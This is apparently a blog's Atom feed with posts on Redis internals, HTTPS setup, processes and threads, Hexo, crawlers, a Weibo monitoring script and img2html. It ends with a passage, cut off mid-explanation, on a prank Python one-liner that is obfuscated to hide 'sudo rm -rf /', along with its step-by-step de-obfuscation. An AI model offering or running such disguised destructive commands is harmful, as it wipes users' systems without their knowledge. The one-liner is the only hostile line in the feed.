| | StringObject|</span><br><span class="line">+---------------+ | "keke" +-->NULL</span><br><span class="line"> +-------------+</span><br></pre></td></tr></table></figure></p><h3 id="zset-–-gt-ziplist-skiplist"><a href="#zset-–-gt-ziplist-skiplist" class="headerlink" title="zset –> ziplist/skiplist"></a>zset –> ziplist/skiplist</h3><p>有序集合有 ziplist 和 skiplist 两种方式作为底层的存储结构。</p><ol><li>当 zset 保存的元素小于 <code>zset-max-ziplist-entries</code> 个,且所有元素长度都小于 <code>zset-max-ziplist-value</code> 字节时,zset 底层通过 ziplist 存储。</li><li>否则,使用 skiplist 存储。</li></ol><p>同上面其他结构一样,当 <code>1</code> 条件任一不满足时,底层的数据存储结构将转换为第二种。</p><hr><h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>简单总结了下 Redis 用户端常用的数据结构,以及底层抽象的各种数据结构,以及二者是如何组合起来的。</p><p>Redis 面向用户侧的各种数据结构,并不直接实现,而是通过对象系统,在特定的条件下选择特定的底层结构,以在效率和存储空间之间平衡。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> +----------+ +----------+ +----------+ +----------+</span><br><span class="line"> | string | | list | | zset | | ... 
|</span><br><span class="line"> +----+-----+ +----+-----+ +----+-----+ +----------+</span><br><span class="line"> | | | </span><br><span class="line"> / \ | +-------------------+ </span><br><span class="line"> / | \ | | | </span><br><span class="line"> / | \ | | | </span><br><span class="line"> +-/ | \----+ +--+---+-------+ +----------------------------+ </span><br><span class="line"> | | | | | | | </span><br><span class="line">+---v-+ +v----+ +v-------+ +---v---v-+ +--v--------+ +-----------+ +--------+ +-v--------+ +-----+</span><br><span class="line">| int | | raw | | embstr | | ziplist | | linkedlist| | hashtable | | intset | | skiplist | | ... |</span><br><span class="line">+-----+ +-----+ +--------+ +----^----+ +-----------+ +---^-----^-+ +-^------+ +----------+ +-----+</span><br><span class="line"> | | | | </span><br><span class="line"> | | | | </span><br><span class="line"> | | | | </span><br><span class="line"> | +----------+ | +-+------+-+ </span><br><span class="line"> +---+ hash +-----------+ | set |</span><br><span class="line"> +----------+ +----------+</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
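<p>Pretty much every backend developer ends up using Redis as a data store or cache. At many of the internet companies I know of, Redis plays a role that is hard to replace. This post tries to briefly introduce some of the data structures used in the Redis implementation.</p>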
<hr>
<h2 id="Redis-用户侧支持的数据结构"><a href
</summary>
<category term="Redis" scheme="https://xlzd.me/tags/Redis/"/>
<category term="data-structure" scheme="https://xlzd.me/tags/data-structure/"/>
</entry>
<entry>
<title>Enabling HTTPS with Let's Encrypt</title>
<link href="https://xlzd.me/2018/05/12/lets-encrypt/"/>
<id>https://xlzd.me/2018/05/12/lets-encrypt/</id>
<published>2018-05-12T09:49:35.000Z</published>
<updated>2019-05-14T06:33:49.577Z</updated>
<content type="html"><![CDATA[<p>These are my notes on enabling HTTPS with Let's Encrypt, using Ubuntu 16.04 + nginx as the example. nginx on my server was already configured for the relevant domains, so I skip that part.</p><p>First, install certbot:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo add-apt-repository ppa:certbot/certbot</span><br><span class="line">sudo apt-get update</span><br><span class="line">sudo apt-get install python-certbot-nginx</span><br></pre></td></tr></table></figure></p><p>Next, open port 443. Check the firewall first:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo ufw status</span><br></pre></td></tr></table></figure></p><p>If the firewall is not enabled, you will see this:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xlzd$ sudo ufw status</span><br><span class="line">Status: inactive</span><br></pre></td></tr></table></figure></p><p>In that case there is nothing to do. If it is enabled, the output looks roughly like this:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Status: active</span><br><span class="line"></span><br><span class="line">To Action From</span><br><span class="line">-- ------ ----</span><br><span class="line">OpenSSH ALLOW Anywhere </span><br><span class="line">Nginx HTTP ALLOW Anywhere </span><br><span class="line">OpenSSH (v6) ALLOW Anywhere (v6)</span><br></pre></td></tr></table></figure></p><p>If the firewall is active, run:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo ufw allow 'Nginx Full'</span><br></pre></td></tr></table></figure></p><p>Now you can generate the certificate:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo certbot --nginx -d fuckthe.app -d www.fuckthe.app</span><br></pre></td></tr></table></figure></p><p>The first time you run it, you will be prompted for an email address.</p><p>After it succeeds, you will see a prompt roughly like this:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Please choose whether or not to redirect HTTP traffic to HTTPS, removing HTTP access.</span><br><span class="line">-------------------------------------------------------------------------------</span><br><span class="line">1: No redirect - Make no further changes to the webserver configuration.</span><br><span class="line">2: Redirect - Make all requests redirect to secure HTTPS access. Choose this for</span><br><span class="line">new sites, or if you're confident your site works on HTTPS. You can undo this</span><br><span class="line">change by editing your web server's configuration.</span><br><span class="line">-------------------------------------------------------------------------------</span><br><span class="line">Select the appropriate number [1-2] then [enter] (press 'c' to cancel): 2</span><br></pre></td></tr></table></figure></p><p>Choose 2; the redirect is then written into the nginx configuration automatically.</p><p>Set up automatic certificate renewal in crontab:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">30 2 * * 1 /usr/bin/certbot renew >> /var/<span class="built_in">log</span>/le-renew.log</span><br><span class="line">35 2 * * 1 /usr/bin/nginx -s reload</span><br></pre></td></tr></table></figure></p><p>The next time you need to add a new domain, just run <code>sudo certbot --nginx -d domain.com</code> again.</p><p>Done.</p>]]></content>
<summary type="html">
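<p>These are my notes on enabling HTTPS with Let's Encrypt, using Ubuntu 16.04 + nginx as the example. nginx on my server was already configured for the relevant domains, so I skip that part.</p>
<p>First, install certbot:<br><figure class="hi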
</summary>
<category term="Linux" scheme="https://xlzd.me/tags/Linux/"/>
<category term="HTTPS" scheme="https://xlzd.me/tags/HTTPS/"/>
</entry>
<entry>
<title>On Processes and Threads</title>
<link href="https://xlzd.me/2018/02/03/process-vs-thread/"/>
<id>https://xlzd.me/2018/02/03/process-vs-thread/</id>
<published>2018-02-03T14:08:22.000Z</published>
<updated>2019-05-14T06:33:49.580Z</updated>
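<content type="html"><![CDATA[<p>Processes and threads are probably among the most frequently asked topics in technical interviews. This post tries to briefly summarize some of the differences between them.</p><p>In the beginning, computers had no such concepts as "process" or "thread". A computer simply did input → compute → output. Most of the time the computer was actually waiting for user input, which is obviously very inefficient; human typing speed can never compare with the speed of a computer.</p><p>So people began to write the instructions to be executed in advance onto media such as paper tape, magnetic tape, or disk, and then hand those instructions to the computer. A dedicated program read the instruction sequence from the storage medium and passed it to the computer for execution. The computer no longer needed a human to type instructions in real time, a great deal of waiting time disappeared, and efficiency rose enormously. That dedicated program was the primitive operating system: the batch operating system.</p><p>Although the batch operating system solved the throughput problem, it still had a drawback: the computer could run only one task (program) at a time. If that program needed a lot of I/O, the CPU sat idle while the I/O was in progress. It would be even better if that idle time could be put to use.</p><p>To further improve efficiency, the "process" was born. The process abstracts the task (program) mentioned above: each running program is a process with its own independent memory space, programs do not interfere with one another, and the operating system schedules them. The CPU at this point was still single-core, but the operating system used time sharing to divide CPU time into a great many slices. Within each slice it executes the instructions of one process, and when the slice ends the operating system schedules the CPU to run the instructions of another program. From the CPU's point of view, only one program is executing at any moment, but because the time slices are extremely small, from a human's point of view it feels as if multiple programs are running "simultaneously".</p><p>Processes have their own independent memory spaces and are unrelated to each other. In many scenarios, however, two programs need a way to pass information (communicate); if two running processes can communicate by some means, program design becomes more flexible and convenient. So inter-process communication appeared: pipes, message queues, signals, and so on can all be used for communication between two processes.</p><p>Multiple processes let one CPU run several different programs "simultaneously", but inside a single program instructions were still processed serially. In many scenarios, even within one program, multiple subtasks can be designed to run independently and concurrently. To let the submodules inside one program run concurrently, the "thread" was born. A thread abstracts a subtask within a process: one process can have multiple subtasks (threads) executing at the same time, and these subtasks share the data of the same process. <strong>Once the thread concept appeared, the thread became the smallest unit of operating system scheduling, while the process became the smallest unit of operating system resource allocation.</strong></p><p>Multithreading and multiprocessing greatly improved multitasking performance, but from the CPU's point of view all tasks were still essentially executed serially, not truly in parallel. Only with the arrival of multi-core CPUs could the operating system schedule different threads onto multiple cores and achieve true parallel execution.</p><p>In practice, using multiple threads or multiple processes is not automatically better. You need to consider the concrete scenario and choose a suitable model for the business case. For example, Redis executes commands in a single process on a single thread, while Nginx can use multiple processes or multiple threads, yet both are very high-performance applications.</p>]]></content>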
<summary type="html">
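<p>Processes and threads are probably among the most frequently asked topics in technical interviews. This post tries to briefly summarize some of the differences between them.</p>
<p>In the beginning, computers had no such concepts as "process" or "thread". A computer simply did input → compute → output. Most of the time the computer was actually waiting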
</summary>
<category term="Linux" scheme="https://xlzd.me/tags/Linux/"/>
</entry>
<entry>
<title>Syncing Hexo Configuration and Data Across Multiple Machines</title>
<link href="https://xlzd.me/2017/11/30/sync-hexo/"/>
<id>https://xlzd.me/2017/11/30/sync-hexo/</id>
<published>2017-11-30T12:07:09.000Z</published>
<updated>2019-05-14T06:33:49.583Z</updated>
<content type="html"><![CDATA[<p>After migrating my blog to hexo, I started thinking about how to sync hexo's configuration and data so I can switch between several computers painlessly and seamlessly.</p><p>The solution: GitHub.</p><p>If you need to customize the theme, it is best to fork it to your own GitHub account and sync all theme changes to that fork. This makes your theme modifications easy to manage.</p><p>First, initialize a repository in the hexo root directory, and manage the theme under themes as a git submodule:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cd</span> xlzd.github.io</span><br><span class="line">$ git init</span><br><span class="line">$ git checkout -b hexo-source</span><br><span class="line">$ git remote add origin git@github.com:xlzd/xlzd.github.io.git</span><br><span class="line">$ git submodule add git@github.com:xlzd/hexo-theme-freemind.386.git themes/freemind.386</span><br><span class="line">$ git add .</span><br><span class="line">$ git commit -m <span class="string">"init hexo source"</span></span><br><span class="line">$ git push origin hexo-source</span><br></pre></td></tr></table></figure><hr><p>On another machine:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ git <span class="built_in">clone</span> git@github.com:xlzd/xlzd.github.io.git</span><br><span class="line">$ <span class="built_in">cd</span> xlzd.github.io</span><br><span class="line">$ git checkout hexo-source</span><br><span class="line">$ git submodule init</span><br><span class="line">$ git submodule update</span><br><span class="line">$ npm install</span><br><span class="line">$ hexo generate && hexo server</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
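<p>After migrating my blog to hexo, I started thinking about how to sync hexo's configuration and data so I can switch between several computers painlessly and seamlessly.</p>
<p>The solution: GitHub.</p>
<p>If you need to customize the theme, it is best to fork it to your own GitHub account and sync all theme changes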
</summary>
<category term="hexo" scheme="https://xlzd.me/tags/hexo/"/>
</entry>
<entry>
<title>Archive of Web Crawler Posts</title>
<link href="https://xlzd.me/2017/11/21/crawler-archive/"/>
<id>https://xlzd.me/2017/11/21/crawler-archive/</id>
<published>2017-11-21T14:38:50.000Z</published>
<updated>2019-05-14T06:33:49.575Z</updated>
<content type="html"><![CDATA[<p>This post collects the crawler-related articles I wrote earlier into one list.<br>I wrote a lot of crawlers at my previous job and, along the way, a few introductory crawler articles. I had planned to write more about advanced crawling techniques, but I no longer want to touch crawlers, so I dropped the idea.</p><p>The earlier articles are listed below. I will probably never touch anything crawler-related again. (Disclaimer: these are old, so I cannot guarantee that the methods still work or that they are accurate. For reference only.)</p><ul><li><a href="https://zhuanlan.zhihu.com/p/20410446" target="_blank" rel="noopener">A Crawler Essential: requests</a></li><li><a href="https://zhuanlan.zhihu.com/p/20413379" target="_blank" rel="noopener">Web Crawler with Python - 01. Preparation</a></li><li><a href="https://zhuanlan.zhihu.com/p/20413828" target="_blank" rel="noopener">Web Crawler with Python - 02. A Simple Attempt</a></li><li><a href="https://zhuanlan.zhihu.com/p/20416894" target="_blank" rel="noopener">Side Story. Setting Up a Comfortable Python Development Environment</a></li><li><a href="https://zhuanlan.zhihu.com/p/20423182" target="_blank" rel="noopener">Web Crawler with Python - 03. Douban Movie TOP250</a></li><li><a href="https://zhuanlan.zhihu.com/p/20430122" target="_blank" rel="noopener">Web Crawler with Python - 04. Another Way to Scrape</a></li><li><a href="https://zhuanlan.zhihu.com/p/20432575" target="_blank" rel="noopener">Web Crawler with Python - 05. Storage</a></li><li><a href="https://zhuanlan.zhihu.com/p/20435541" target="_blank" rel="noopener">Web Crawler with Python - 06. Strategies for Scraping Massive Data</a></li><li><a href="https://zhuanlan.zhihu.com/p/20471442" target="_blank" rel="noopener">Web Crawler with Python - 07. Anti-Crawling Mechanisms (1)</a></li><li><a href="https://zhuanlan.zhihu.com/p/20494731" target="_blank" rel="noopener">Web Crawler with Python - 08. Simulated Login</a></li><li><a href="https://zhuanlan.zhihu.com/p/20546546" target="_blank" rel="noopener">Web Crawler with Python - 09. Using a Crawler to Find the Shortest Follow Chain Between Me and 轮子哥</a></li></ul><p>As you can see in many places in those articles, I dug plenty of holes for myself, intending to fill them in later. For now, though, I have no plans to fill them.</p>]]></content>
<summary type="html">
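<p>This post collects the crawler-related articles I wrote earlier into one list.<br>I wrote a lot of crawlers at my previous job and, along the way, a few introductory crawler articles. I had planned to write more about advanced crawling techniques, but I no longer want to touch crawlers, so I dropped the idea.</p>
<p>The earlier articles are listed below. I will probably never touch any crawler-related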
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
<category term="Crawler" scheme="https://xlzd.me/tags/Crawler/"/>
</entry>
<entry>
<title>hello, world.</title>
<link href="https://xlzd.me/2017/11/11/hello-world/"/>
<id>https://xlzd.me/2017/11/11/hello-world/</id>
<published>2017-11-10T17:07:00.000Z</published>
<updated>2019-05-14T06:33:49.576Z</updated>
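<content type="html"><![CDATA[<p>Because of a wall that does not exist, my VPS was blocked during the 19th National Congress, leaving the blog inaccessible for more than half a month. So I simply moved the blog from my own VPS back to GitHub Pages. I am past the age for tinkering anyway, so I will just use the simple and convenient hexo.</p><p>I wrote quite a few posts on the old blog. The quality was not high, but they were still my own notes from the past. I will migrate a small part of them to the new blog, but most will not be moved. The blogroll has a link to the old blog (it may not be reachable); feel free to take a look if you are interested.</p><p>That's all for now.</p><p>hello, world.</p>]]></content>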
<summary type="html">
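<p>Because of a wall that does not exist, my VPS was blocked during the 19th National Congress, leaving the blog inaccessible for more than half a month. So I simply moved the blog from my own VPS back to GitHub Pages. I am past the age for tinkering anyway, so I will just use the simple and convenient hexo.</p>
<p>I wrote quite a few posts on the old blog. The quality was not high, but they were still my own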
</summary>
<category term="nonsense" scheme="https://xlzd.me/tags/nonsense/"/>
</entry>
<entry>
<title>Following Your Crush in Near Real Time with the Weibo API and Pushbullet</title>
<link href="https://xlzd.me/2017/06/01/weibo-with-pushbullet/"/>
<id>https://xlzd.me/2017/06/01/weibo-with-pushbullet/</id>
<published>2017-05-31T17:56:56.000Z</published>
<updated>2019-05-14T06:33:49.583Z</updated>
<content type="html"><![CDATA[<p>The title is a bit clickbait. Just now, out of boredom, I used the Weibo API and the Pushbullet API to build a small tool for following someone in near real time.<br>The principle is simple: poll the Weibo API continuously, and when a new post appears, push a message to my phone and computer through the Pushbullet API.</p><p><a href="https://www.pushbullet.com/" target="_blank" rel="noopener">Pushbullet</a> is a cross-platform message push tool that makes it easy to pass messages between devices, and it also provides an API for programmatic use. On PyPI there is a library, <a href="https://pypi.python.org/pypi/pushbullet.py" target="_blank" rel="noopener">pushbullet.py</a>, that wraps its API and makes it simpler to use. The functionality needed here is simple:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pushbullet <span class="keyword">import</span> Pushbullet</span><br><span class="line"></span><br><span class="line">pb = Pushbullet(API_KEY)</span><br><span class="line">pb.push_note(title, body)</span><br></pre></td></tr></table></figure><p>This sends the message to every device logged in to the account that owns API_KEY. You create the API_KEY after logging in, via "Create Access Token" on the page shown in the screenshot below.</p><p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/create-access-token.jpg" alt="create-access-token"></p><a id="more"></a><p>Watching for someone's new posts can be done through Weibo's <a href="http://open.weibo.com/wiki/%E5%BE%AE%E5%8D%9AAPI" target="_blank" rel="noopener">API</a>. A long, long time ago I registered a Weibo app to build a time-announcing bot, and it came in handy here. If you do not have an app, just create one.</p><p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/weibo.jpg" alt="create-access-token"></p><p><a href="https://pypi.python.org/pypi/weibo" target="_blank" rel="noopener">weibo</a> is a wrapper library for the Weibo API. Usage is roughly:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> weibo <span class="keyword">import</span> Client</span><br><span class="line"></span><br><span class="line">APP_KEY = <span class="string">'*****'</span></span><br><span class="line">APP_SECRET = <span class="string">'******'</span></span><br><span class="line">CALLBACK_URL = <span class="string">'https://api.weibo.com/oauth2/default.html'</span></span><br><span class="line">AUTH_URL = <span class="string">'https://api.weibo.com/oauth2/authorize'</span></span><br><span class="line">USERID = <span class="string">'******'</span></span><br><span class="line">PASSWD = <span class="string">'*******'</span></span><br><span class="line"></span><br><span class="line">client = Client(APP_KEY, APP_SECRET, CALLBACK_URL, username=USERID, password=PASSWD)</span><br><span class="line">data = client.get(<span class="string">'API_PATH'</span>)</span><br></pre></td></tr></table></figure><p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/weibo2.jpg" alt="create-access-token"></p><p>Because of Weibo API restrictions, you can no longer directly fetch the post list of a user who has not authorized your app. My Weibo account happened to follow nobody, so after following the person whose updates I care about, fetching my own feed returns exactly that person's most recent posts in chronological order. While I am at it, here is a bug report for Weibo, probably caused by out-of-sync caches: I have clearly deleted all my posts (only one is left) and unfollowed everyone, yet the numbers on my profile page are wrong:<br><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/weibo2.jpg" alt="create-access-token"></p><p>If you follow many people, one solution is to fetch more entries when reading your feed by using the since_id and count parameters of the <a href="http://open.weibo.com/wiki/2/statuses/user_timeline" target="_blank" rel="noopener">user_timeline endpoint</a>, record the position of the last entry each time, read from the newest data back to where you stopped last time, and then filter out everyone else's posts.<br>What remains is to write a crontab entry that reads the feed at intervals and, if there is a new post, pushes a message to yourself via the Pushbullet API. The data returned by this endpoint also includes the poster's profile, so you can monitor changes to the target user's profile as a bonus.</p><p>As for the crontab interval, according to Weibo's API <a href="http://open.weibo.com/wiki/%E6%8E%A5%E5%8F%A3%E8%AE%BF%E9%97%AE%E9%A2%91%E6%AC%A1%E6%9D%83%E9%99%90-" target="_blank" rel="noopener">rate limits</a>, once per minute is fine.</p><p>The final result looks like this:</p><p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/result.jpg" alt="create-access-token"><br><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/result2.jpg" alt="create-access-token"></p><p>It is getting late and this write-up is a bit sloppy. The complete code is here: <a href="https://gist.github.com/xlzd/01b8b8e1909ae0f601c85e142f2bd15b" target="_blank" rel="noopener">weibo monitor - GitHub Gist</a>, for reference only.</p>]]></content>
<summary type="html">
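<p>The title is a bit clickbait. Just now, out of boredom, I used the Weibo API and the Pushbullet API to build a small tool for following someone in near real time.<br>The principle is simple: poll the Weibo API continuously, and when a new post appears, push a message to my phone and computer through the Pushbullet API.</p>
<p><a href="https://www.pushbullet.com/" target="_blank" rel="noopener">Pushbullet</a> is a cross-platform message push tool that makes it easy to pass messages between devices, and it also provides an API for programmatic use. On PyPI there is a library, <a href="https://pypi.python.org/pypi/pushbullet.py" target="_blank" rel="noopener">pushbullet.py</a>, that wraps its API and makes it simpler to use. The functionality needed here is simple:</p>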
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pushbullet <span class="keyword">import</span> Pushbullet</span><br><span class="line"></span><br><span class="line">pb = Pushbullet(API_KEY)</span><br><span class="line">pb.push_note(title, body)</span><br></pre></td></tr></table></figure>
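<p>This sends the message to every device logged in to the account that owns API_KEY. You create the API_KEY after logging in, via "Create Access Token" on the page shown in the screenshot below.</p>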
<p><img src="http://7xkpi6.com1.z0.glb.clouddn.com/blog/2017/06/01/create-access-token.jpg" alt="create-access-token"></p>
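<p>The polling idea described above can be sketched roughly as follows. This is only a minimal sketch under stated assumptions: the status dictionaries and their <code>id</code>, <code>user</code>, and <code>text</code> keys are hypothetical stand-ins for whatever the Weibo API returns, the function name is made up for illustration, and <code>push</code> is any callable that takes a title and a body, such as <code>pb.push_note</code> from the snippet above.</p>

```python
def push_new_statuses(statuses, last_seen_id, push):
    """Push every status newer than last_seen_id and return the newest id seen.

    statuses: iterable of dicts with hypothetical "id", "user" and "text" keys.
    push: callable taking (title, body), for example pb.push_note.
    """
    newest_id = last_seen_id
    # Oldest first, so notifications arrive in the order the posts were made.
    for status in sorted(statuses, key=lambda s: s["id"]):
        if status["id"] > last_seen_id:
            push(status["user"], status["text"])
            newest_id = status["id"]
    return newest_id


# Stand-in for pb.push_note so the sketch runs without any network access.
sent = []
polled = [
    {"id": 3, "user": "alice", "text": "third"},
    {"id": 2, "user": "alice", "text": "second"},
]
last_seen = push_new_statuses(polled, 2, lambda title, body: sent.append((title, body)))
print(last_seen, sent)
```

<p>Persisting the returned id between runs (in a file, say) is what would let a once-per-minute cron job avoid sending the same notification twice.</p>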
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>img2html: Converting an Image into an HTML Page</title>
<link href="https://xlzd.me/2017/04/02/img2html/"/>
<id>https://xlzd.me/2017/04/02/img2html/</id>
<published>2017-04-02T14:22:14.000Z</published>
<updated>2019-05-14T06:33:49.576Z</updated>
<content type="html"><![CDATA[<p>Out of boredom, I wrote a program that converts an image into an HTML page.<br>As shown below, the left side is the original image and the right side is an HTML page that reproduces it using text in different colors:</p><table><thead><tr><th style="text-align:center">Original image</th><th style="text-align:center">After conversion</th></tr></thead><tbody><tr><td style="text-align:center"><img src="https://raw.githubusercontent.com/xlzd/img2html/master/demo/before.png" alt></td><td style="text-align:center"><img src="https://raw.githubusercontent.com/xlzd/img2html/master/demo/after.png" alt></td></tr></tbody></table><p>(Note: the one on the right is not an image but an <a href="http://old-blog.xlzd.me/hide/img2html/" target="_blank" rel="noopener">HTML page</a>.)</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"> ___ __ __ ___</span><br><span class="line"> __ /'___`\ /\ \ /\ \__ /\_ \</span><br><span class="line">/\_\ ___ ___ __ /\_\ /\ \ \ \ \___ \ \ ,_\ ___ ___ \//\ \</span><br><span class="line">\/\ \ /' __` __`\ /'_ `\ \/_/// /__ \ \ _ `\ \ \ \/ /' __` __`\ \ \ \</span><br><span class="line"> \ \ \ /\ \/\ \/\ \ /\ \L\ \ // /_\ \ \ \ \ \ \ \ \ \_ /\ \/\ \/\ \ \_\ \_</span><br><span class="line"> \ \_\\ \_\ \_\ \_\\ \____ \ /\______/ \ \_\ \_\ \ \__\\ \_\ \_\ \_\ /\____\</span><br><span class="line"> \/_/ \/_/\/_/\/_/ \/___L\ \ \/_____/ \/_/\/_/ \/__/ \/_/\/_/\/_/ \/____/</span><br><span class="line"> /\____/</span><br><span class="line"> \_/__/</span><br></pre></td></tr></table></figure><p>I named the program "img2html" and uploaded it to <a href="https://pypi.python.org/pypi/img2html" target="_blank" rel="noopener">PyPI</a>, so you can install it directly like this:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip install img2html</span><br></pre></td></tr></table></figure><p>It can be invoked from the command line or from code. Usage details are in the README on GitHub: <a href="https://github.com/xlzd/img2html" target="_blank" rel="noopener">img2html</a>.</p><p>The logic is very simple: every N*N block of pixels is merged into one pixel whose color is the average of those N*N pixels, and that color is rendered as the text color at the corresponding position in the HTML page. Although the code uses four for statements, it only visits each pixel of the image once.</p>]]></content>
<summary type="html">
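<p>Out of boredom, I wrote a program that converts an image into an HTML page.<br>As shown below, the left side is the original image and the right side is an HTML page that reproduces it using text in different colors:</p>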
<table>
<thead>
<tr>
<th style="text-align:center">Original image</t
</summary>
<category term="Python" scheme="https://xlzd.me/tags/Python/"/>
</entry>
<entry>
<title>A Guide to Python Gibberish: Deleting the Root Directory in One Line</title>
<link href="https://xlzd.me/2017/03/14/python-one-line-rm-rf/"/>
<id>https://xlzd.me/2017/03/14/python-one-line-rm-rf/</id>
<published>2017-03-14T00:47:51.000Z</published>
<updated>2019-05-14T06:33:49.581Z</updated>
<content type="html"><![CDATA[<p>A while ago I saw a question on Zhihu: <a href="https://www.zhihu.com/question/37046157" target="_blank">"What outrageous things can one line of Python code do?"</a> It looked fun, so I wrote an answer:</p><blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">> (<span class="keyword">lambda</span> _: getattr(__import__(_(<span class="number">28531</span>)), _(<span class="number">126965465245037</span>))(_(<span class="number">9147569852652678349977498820655</span>)))((<span class="keyword">lambda</span> ___, __, _: <span class="keyword">lambda</span> n: ___(__(n))[_ << _:-_].decode(___.__name__))(hex, long, <span class="keyword">True</span>))</span><br><span class="line">></span><br></pre></td></tr></table></figure></blockquote><blockquote><p>Works on OS X and Linux, needs to be run with administrator privileges, and the effect is touching.</p><p>Author: xlzd<br>Link: <a href="https://www.zhihu.com/question/37046157/answer/101660005" target="_blank">https://www.zhihu.com/question/37046157/answer/101660005</a><br>Source: Zhihu<br>Copyright belongs to the author. Please contact the author for permission to repost.</p></blockquote><p>It was meant only as a prank, but to my surprise someone actually ran this line. And then everything on his Mac was wiped... </p><p>So how does this line of code do it?</p><a id="more"></a><hr><p>It is actually not complicated; it is just some code in disguise. Translated into its most direct form, the line is only two lines:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line">os.system(<span class="string">'sudo rm -rf /'</span>)</span><br></pre></td></tr></table></figure><p>The first step is to get rid of <code>import</code> and use the <code>__import__</code> function instead, which takes a string and returns the module itself:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__import__(<span class="string">'os'</span>).system(<span class="string">'sudo rm -rf /'</span>)</span><br></pre></td></tr></table></figure><p>OK, now it is a single line. What remains is to make it harder and harder to read. The idea is to turn as much of it as possible into strings and then transform those strings. Using the <code>getattr</code> function, it can be rewritten as:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">getattr(__import__(<span class="string">'os'</span>), <span class="string">'system'</span>)(<span class="string">'sudo rm -rf /'</span>)</span><br></pre></td></tr></table></figure><p>At this point, note that a <code>lambda</code> function can be defined and called in the same expression. Also, in Python, functions can be passed as arguments:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">In [1]: (lambda n: n*2) (2)</span><br><span class="line">Out[1]: 4</span><br><span class="line"></span><br><span class="line">In [2]: (lambda f: f('10')) (int)</span><br><span class="line">Out[2]: 10</span><br></pre></td></tr></table></figure><p>Next, find a way to stop writing the three strings <code>os</code>, <code>system</code>, and <code>sudo rm -rf /</code> literally. Instead, convert them to numbers and pass in a function that decodes a number back into a 